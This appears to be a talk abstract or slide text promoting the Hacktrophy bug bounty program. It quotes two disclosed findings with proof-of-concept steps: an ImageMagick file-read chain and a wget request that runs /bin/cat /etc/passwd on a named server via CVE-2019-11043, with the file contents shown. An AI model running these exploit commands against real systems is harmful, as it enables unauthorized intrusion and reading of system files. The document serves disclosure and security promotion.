CEO of Nethemba - Slovak IT security company founded in 2007, primarily focused on web application security and various penetration tests.
The main advantage of bug bounty programs over traditional penetration tests and security audits:
Disclaimer: The customer explicitly agreed with publishing their findings
Remove button in the "Rules -> Exception" section.
hacktrophy is vulnerable to local file inclusion (LFI), due to an outdated version of ImageMagick being used (CVE-2022-44268). Proof-of-Concept: Log into app.hacktrophy.com and upload the attached `poc.png` as profile image (via "Account Settings"). Then open the "Application" tab in Chrome's "Developer Tools" and download the resulting image (see attached `screenshot.png`). Finally, run... $ identify -verbose 658-jsbounty-thumb_poc.png | grep -A9999 "Raw profile type" | tail -n +4 | grep -v ":" | xxd -r -ps root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync
Remote Code Execution in https://cloud.nethemba.com via CVE-2019-11043: PoC wget "https://cloud.nethemba.com/index.php?a=/bin/cat%20/etc/passwd" -qO-
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
The hackers could spot the given vulnerabilities immediately (there is a direct incentive to be the first one), often before official security patches were released.
Thanks to the Hacktrophy Bug bounty program, you are informed about vulnerabilities IMMEDIATELY - no need to wait for black hat hackers to exploit them with severe and unexpected consequences.
By Pavol Luptak
In this presentation, we'll discuss real-life scenarios how Hacktrophy helped the customers to reveal serious security vulnerabilities